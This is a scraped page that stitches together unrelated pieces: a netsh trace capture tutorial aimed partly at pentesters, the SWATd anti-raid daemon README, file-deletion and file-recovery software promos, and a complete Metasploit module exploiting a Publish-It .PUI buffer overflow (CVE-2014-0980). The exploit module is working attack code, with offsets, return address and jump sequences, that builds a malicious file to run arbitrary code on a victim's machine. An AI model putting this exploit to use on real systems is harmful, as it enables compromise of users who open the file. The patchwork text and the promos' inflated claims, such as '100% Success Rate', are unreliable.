capture, usually to a specific host IP, protocol or similar. You can see more on this here: netsh trace show capturefilterhelp One of the examples in this output shows you how t o e.g. 'netsh trace start capture=yes Ethernet.Type=IPv4 IPv4.Address=157.59.136.1' You could also add Protocol=TCP or UDP and so on.. Full syntax and notes for netsh trace can be found here: https://technet.microsoft.com/en-us/library/dd878517 For instance, the following session shows me capturing an issue with a firewall that I'm working on. Note that you need admin rights to run this, the same as any capture tool. In a pentest you would likely specify an output file that isn't in the users' directory. C:\>netsh trace start capture=yes IPv4.Address=192.168.122.2 Trace configuration: ------------------------------------------------------------------- Status: Running Trace File: C:\Users\Administrator\AppData\Local\Temp\NetTraces\NetTrace .etl Append: Off Circular: On Max Size: 250 MB Report: Off When you are done capturing data, it's time to stop it: C:\> netsh trace stop Correlating traces ... done Generating data collection ... done The trace file and additional troubleshooting information have been compiled as "C:\Users\Administrator\AppData\Local\Temp\NetTraces\NetTrace.cab". File location = C:\Users\Administrator\AppData\Local\Temp\NetTraces\NetTrace.etl Tracing session was successfully stopped. c:\ The cool thing about this is that it doesn't need a terminal session (with a GUI, cursor keys and so on). If all you have is a metasploit shell, netsh trace works great! If this is a capture for standard sysadmin work, you can simply copy the capture over to your workstation and proceed on with analysis. If this is a pentest, a standard copy might still work (remember, we're on a Microsoft server), but if you need netcat type function to exfiltrate your capture, take a look at PowerCat (which is a netcat port in PowerShell). Next, open the file (which is in Microsoft's ETL format) in Microsoft's Message Analyzer app - which you can install on your workstation rather than the server we ran the capture on ( Download Microsoft Message Analyzer from Official Microsoft Download Center ). Message Analyzer has a surprisingly nice interface and some decent packet parsing, you might be able to wrap up your analysis just in this tool (see below). If you do need another packet analysis tool, it's easy to a File / Save As / Export, and save as a PCAP file that Wireshark, tcpdump, SNORT, ngrep, standard python or perl calls, or any other standard tool can read natively. Or you can convert to PCAP using PowerShell (of course you can). A short, simple script to do this might look like: $s = New-PefTraceSession -Path “C:\output\path\spec\OutFile.Cap” -SaveOnStop $s | Add-PefMessageProvider -Provider “C:\input\path\spec\Input.etl” $s | Start-PefTraceSession This Powershell cmdlet is not available in Windows 7 - you'll need Windows 8, or Server 2008 or newer (This script was found at So you want to use Wireshark to read the netsh trace output .etl? - The troubleshooters and problem solvers... - Site Home - TechNet Blogs ) If 'netsh trace' has solved an interesting problem for you, or was the tool that got you some interesting data in a pentest, please, use our comment form to let us know how you used it (within your NDA of course!) ====================== - some extra information to prevent confusion: on Windows 7, the NETSH TRACE command is only available on the 64-bit version of NETSH so in case it tells you the TRACE command is not available then just make sure to run the 64-bit version... c:\>netsh trace The following command was not found: trace. c:\>run -l netsh 1) CHOSEN: netsh.exe [C:\Windows\SysWOW64] 2) netsh.exe [C:\Windows\winsxs\amd64_microsoft-windows-netsh_31bf3856ad364e35_6.1.7600.16385_none_bb95e7e51189d8f9] 3) windows - What appid should I use with netsh.exe- - Stack Overflow.url [F:\AWS\Sec] c:\>run -1 netsh trace Running: C:\Windows\SysWOW64\netsh.exe: The following command was not found: trace. c:\>run -2 netsh trace Running: C:\Windows\winsxs\amd64_microsoft-windows-netsh_31bf3856ad364e35_6.1.7600.16385_none_bb95e7e51189d8f9\netsh.exe: ? - convert - Converts a trace file to an HTML report. correlate - Normalizes or filters a trace file to a new output file. diagnose - Start a diagnose session. dump - help - show - List interfaces, providers and tracing state. start - Starts tracing. stop - Stops tracing. Source: HERE

SWATd lets you configure 'sensors' that check your PC's external environment. When enough sensors 'fail', SWATd will run a script for you. Sensors are commands or scripts that get executed repeatedly. A sensor is said to fail when its exit code makes a transition from zero (working) to non-zero (not working). This makes configuration easy and powerful. For example, you can make a sensor that checks if your website is online, and then make a command to alert you when the sensor fails. SWATd was originally written as a tool to defend against theft by criminals or to detect when your computer is captured by police. For example, you can set a sensor to detect if your WiFi network is in range, and when it goes out of range, automatically unmount encrypted volumes. So if someone steals your laptop from your house, your files will be safe. Since SWATd only counts the failure when the sensor changes from a "WiFi in range" state to a "WiFi out of range" state, if you use your laptop somewhere else, you don't need to worry about disabling SWATd every time you leave your house. WARNING: While this may be helpful for some, there are significant risks. For one, in some countries, including the United States, you could go to jail on obstruction of justice charges just for running SWATd, even though you are innocent. Second, SWATd is not perfect: law enforcement or a smart thief can still dump your RAM, thus getting your encryption keys, before doing anything that would make a sensor fail. Use with caution, and consult an attorney first. It's most likely the case that if you find yourself needing to rely on SWATd, then you have already lost. Building and Installing To build SWATd, cd into the source code directory and run make. This will create a swatd executable. If you want to install it as a daemon, refer to your operating system's manuals. To run SWATd from a terminal (non-daemon), pass the -s option. Arch Linux To install SWATd on Arch Linux, copy swatd into /usr/bin: # make # install swatd /usr/bin/ Create the configuration file (See the Configuration section below): # mkdir /etc/swatd # chmod 700 /etc/swatd # vim /etc/swatd/swatd.conf If you want SWATd to start when you boot, add the following to /etc/systemd/system/swatd.service. [Unit] Description=SWATd [Service] Type=forking PIDFile=/var/run/swatd.pid ExecStart=/usr/bin/swatd -p /var/run/swatd.pid Restart=on-abort [Install] WantedBy=multi-user.target Then run: # systemctl enable swatd.service # systemctl start swatd.service You can check the status of SWATd by running: # systemctl status swatd.service Read SWATd's log entries by running: # journalctl /usr/bin/swatd Debian To install SWATd on Debian, copy swatd into /usr/bin: # make # install swatd /usr/bin/ Create the configuration file (See the Configuration section below): # mkdir /etc/swatd # chmod 700 /etc/swatd # vim /etc/swatd/swatd.conf Then copy swatd.init to /etc/init.d/ and enable it: # cp swatd.init /etc/init.d/swatd # update-rc.d swatd defaults Configuration By default, SWATd looks for a configuration file in /etc/swatd/swatd.conf. Alternatively, you can provide a configuration file path to SWATd with the -c option. In any case, the configuration file must not be world writable, or SWATd will refuse to run. The configuration file syntax is extremely simple. There are only three options: interval, threshold, and execute. To set a value for one of the options, begin a line with its name, followed by a colon, followed by the value. Everything after a '#' is treated as a comment (ignored). Blank lines are ignored. All other lines define a sensor command. interval is the number of seconds to wait between sensor checks. threshold is the number of sensors that must fail before assuming you are being raided. execute is the command to execute when you are being raided. Here is an example configuration file: # This configuration makes SWATd continually check if /tmp/foobar exists. If # /tmp/foobar stops existing (goes from existing to not existing), SWATd will # write some text to the file /tmp/ran. # ============================================================================= # The number of seconds to wait between sensor checks. # ============================================================================= interval: 30 # ============================================================================= # The number of sensors that must 'fail' at the same time. # ============================================================================= threshold: 1 # ============================================================================= # The command to execute when 'threshold' sensors fail. # ============================================================================= execute: echo "haiii" > /tmp/ran # ============================================================================= # Sensor commands. # A sensor has 'failed' when the exit code transisions from zero to non-zero. # If a sensor's exit code is transitions from zero to 255, the command will be # executed immediately regardless of the 'threshold' setting, and the failure # count will not be incremented. # WARNING: Sensor commands MUST terminate. # ============================================================================= test -e /tmp/foobar Link: https://github.com/defuse/swatd

Zer0 is a user friendly file deletion tool with a high level of security. With Zer0, you'll be able to delete files and to prevent file recovery by a 3rd person. So far, no user reported an efficient method to recover a file deleted by Zer0. Features User friendly HMI : Drag'n'drop, 1 click and the job is done ! High security file deletion algorithm Multithreaded application core : Maximum efficiency without freezing the application. Internationalization support. DOWNLOAD LINK :- KC Softwares

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Publish-It PUI Buffer Overflow (SEH)', 'Description' => %q{ This module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Publish-It to open a malicious .PUI file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Daniel Kazimirow', # Original discovery 'Andrew Smith "jakx_"', # Exploit and MSF Module ], 'References' => [ [ 'OSVDB', '102911' ], [ 'CVE', '2014-0980' ], [ 'EDB', '31461' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0b\x0a", 'DisableNops' => true, 'Space' => 377 }, 'Targets' => [ [ 'Publish-It 3.6d', { 'Ret' => 0x0046e95a, #p/p/r | Publish.EXE 'Offset' => 1082 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Feb 5 2014', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class) end def exploit path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui") fd = File.open(path, "rb") template_data = fd.read(fd.stat.size) fd.close buffer = template_data buffer << make_nops(700) buffer << payload.encoded buffer << make_nops(target['Offset']-payload.encoded.length-700-5) buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399 buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump buffer << make_nops(2) buffer << [target.ret].pack("V") print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(buffer) end end Source

Product Description RaidLabs File Uneraser reliably recovers deleted files and documents, undeletes digital pictures, music, videos, RAR and ZIP archives. The file recovery tool can undelete entire folders. This file recovery software can help in cases when anything else is helpless. File Uneraser can undelete files from all types of storage media including memory sticks, digital cameras, flash drives, USB drives and pretty much any other type of a storage device you can connect to your PC and access as a drive letter. In addition, this undelete software works with NTFS-encrypted and compressed files, and can help you recover files lost from a virus attack, malicious or accidental user activities. No special skills and no information recovery training are required! Try File Uneraser free with full pre-recovery preview. RaidLabs File Uneraser can: Undelete all types of files Unerase deleted documents, pictures, emails, archives, audio and video files Undelete files from emptied Recycle Bin Recover data from FAT and NTFS partitions Perform comprehensive recovery by scanning the entire volume Undelete files from NTFS disks even in older versions of Windows Preview deleted files even in the free version Fully Guided Recovery RaidLabs File Uneraser features a comprehensive and fully guided data recovery wizard. When you start the tool, a wizard will guide you through the entire recovery process, helping you choose the right options in order to perform the safest and most complete recovery. After the disk scan is complete, you’ll see an Explorer-like window listing all recoverable files. You can view any file with a single click or add one to the recovery list with a double-click. If you are about to recover more than just a few files, you can use the search function to choose files of a certain type, select entire folders or choose to restore everything that’s still recoverable. Full Auto Mode You can run File Uneraser in full auto mode, letting it scan your disk and choose the optimal recovery strategy on your behalf. In this mode, the undelete tool scans a target drive automatically and selects the perfect solution to restore as many files as possible. File Uneraser features a number of functional and convenience features usually not available in its price range. Major Highlights PowerSearch performs the complete disk scan in order to locate recoverable files not listed in the file system LivePreview allows previewing more than 250 types of files in live mode with no external viewers required You can view deleted documents and pictures, play music and videos and enter deleted archives like folders even in the free version of File Uneraser Undelete files in Microsoft Windows 2000 / XP / 2003 / Vista / Windows 7 and 8 Full FAT, FAT32, NTFS and NTFS5 support A unique technology for recovering deleted files stored on FAT32 volumes; Recovers encrypted and compressed files from NTFS and NTFS5 disks. -> Download <-Deal Expire in: EXPIRED!

Product Description GiliSoft Video Converter is simply the best choice for your video conversion needs because it supports all the major file formats. Compatible with over 160 video formats, chances are we’ve got your desired output file format covered. To keep up with rapidly advancing technology, GiliSoft Video Converter adds new formats as they’re released! If you want to convert flash to video, merge or cut video, rotate video, GiliSoft Video Converter is your must choice. Exclusive Features of Video Converter: Convert Almost All Video Files Read almost all the popular video formats from Internet, digital camcorders, capture cards, etc. No external codecs needed. The supported video formats are: 3GP File ( *.3gp; *3g2 ), ASF File ( *.asf ), AVI File ( *.avi; *.divx ), FLV File ( *.flv ), M2TS File ( *.m2ts ), MOV File ( *.mov ), MP4 File ( *.mp4; *.m4v ), MPEG File ( *.mpeg; *.mpg; *.dat ), MKV File ( *.mkv ), RMVB File ( *.rmvb; *.rm ), TS File ( *.ts ), VOB File ( *.vob ), WMV File ( *.wmv ). Convert to Various Video Formats Convert video files on your PC to almost all popular video formats such as H.265, MP4.4K, MKW.4K, MPEG-4, DivX, Xvid, H.264, AVI, MKV, FLV, WMV, DPG, 3GP, etc. compatible with iPod / iPhone / iPad (The New iPad) / PSP / ZUNE / NDS / Xbox 360 / PS3, and other specific format supported by Cell Phone, Apple TV, PVP and PDA. Convert to Various Audio Formats Besides video conversion and audio conversion, GiliSoft Video Converter can also convert video to all audio formats such as MP3, MP4, M4A, WMA, WAV, AC3 and DTS, or extract audio from video. Support Various Devices There are more than 10 conversion modes to support various multimedia devices, such as iPod, iPhone, iPad (The New iPad), PSP, Zune, cell phone, PVP, PDA, NDS, Apple TV, Xbox 360, PS3, etc. And Video Converter will be constantly updated to support new devices. GPU Acceleration Transcoding Convert a video with outstanding quality and very fast speed. GiliSoft Video Converter provides hardware accelerated H.264 encoder and Nvidia® CUDA/NVENC H.264 encoder. Convert Flash SWF to Any Video Gilisoft Video Converter is the best option for Flash to Video Conversion. This powerful tool can easily convert Macromedia Flash SWF file to video or audio files. HTML5 Video Converter No matter what kind of format you have your videos in. It can convert multiple videos to an HTML5 compliant format (OGG, H264, WEBM). Support for HTML5 is improving all the time and videos will, in future, be easier to manage and stream. 4K Video Converter Gilisoft Video Converter is a comprehensive application that provides every type of conversion that you might need when you are working with 4K ultra high definition video files. Convert any format to 4K or Convert 4K videos to WMV, MOV, AVI and other formats. Merge Several Files into One & Trim Video File Merge several files or Clip your favorite sections of a video and merge them together. Cut off any video segment(s) of your choice. You also can get rid off advertisements, un-needed parts, etc. and customize your video to your exact needs. Edit, Enhance & Personalize your Videos Files Adjust brightness, saturation, and contrast, grayscale; Change aspect ratio, volume; Crop Video, rotate video; Add watermark to video; Add subtitle to video; Add special effects to video; -> Download <-Deal Expire in: EXPIRED!

Product Description Losing important photos only happens when you don’t prepare well. It is really frustrating. Fortunately, we have Tenorshare Photo Recovery. It provides you a quick and efficient file recovery solution to recover photos, videos, audios and other files from computer and other storages devices, including SD card, digital camera, mobile phone, USB flash drive and more. Recover photos, as well as other files like videos, songs, emails, ZIP files, etc. Recover from hard drive and all portable devices Recover files lost due to any loss situation Preview before recovery and keep only the ones you need Recover Photos in Variety of Types Recover pictures in all popular formats, like JPG, PNG, PSD, GIF, RAW and etc. Get back lost photos shots by any camera brand, such as Cannon, Nikon, Sony, JVC, FujiFilm, and so on. Retrieve deleted photos on your Samsung, HTC, LG, Motorola, and other Android phone or Windows phone. Supports all memory cards, including SD card, CF card, XD card, and etc. All-inclusive File Recovery Besides photo recovery, this photo recovery software is capable of recovering videos, music, and other files like emails, archives, and much more. Recover files that you accidently deleted. Recover files from formatted, corrupted, or damaged partition or device. Preview before You Recover Preview photos in advance to confirm whether they are indeed your need. Pre-listen your lost music with a built-in audio player. Recover More Easily To filter file types for scanning help you restrict the scan to just the ones you need. It saves you a lot of time. It is flexible to pause or continue photo recovery during scanning. Support Wide File Systems It supports all file systems including HFS, HFS+, FAT, NTFS, EXT2, EXT3. Scan Faster Its unique algorithm eases the photo recovery scan and shortens scan time. Work on all Windows OS It supports the latest Windows 8.1, as well as Windows 8/7/XP/Vista. 100% Success Rate You can recover every file that was lost from your computer, or other medium. File Types Supported: Image JPG, BMP, TIFF (TIF), GIF, PNG, PSD CRW,CR2, NEF, ORF, RAF, SR2, MRW, DCR Video AVI, MP4, MOV, M4V, 3G2, 3GP, WMV, ASF, FLV Audio AIF ( AIFF), WAV, MP3, M4A, WMA, MID (MIDI) Document DOC/DOCX, XLS/XLSX, PPT/PPTX, PDF, CWK, HTML/HTM, INDD, EPS, etc. Email PST, DBX, EMLX, etc. Achieve IP, RAR, SIT, etc. File System Supported: HFS, HFS+, FAT, NTFS, EXT2, EXT3 Devices Supported: Memory card SD, CF, MMC(MultiMedia Card), XD Picture Card, SDHC, MicroSD, MiniSD, etc. External hard drive WD, Seagate, Maxtor, Hitachi, Samsung, etc Digital camera/camcorder Nikon, Canon, Kodak, Samsung, Sony, Panasonic, JVC, FujiFilm, etc. Cell Phones Samsung, HTC, Motorola, LG, BlackBerry, Sony Ericsson, Nokia, etc. Others Pen Drive, Floppy Disk, Zip Disk , USB Drive, Music Player, memory stick, etc. -> Download <-Deal Expire in: EXPIRED!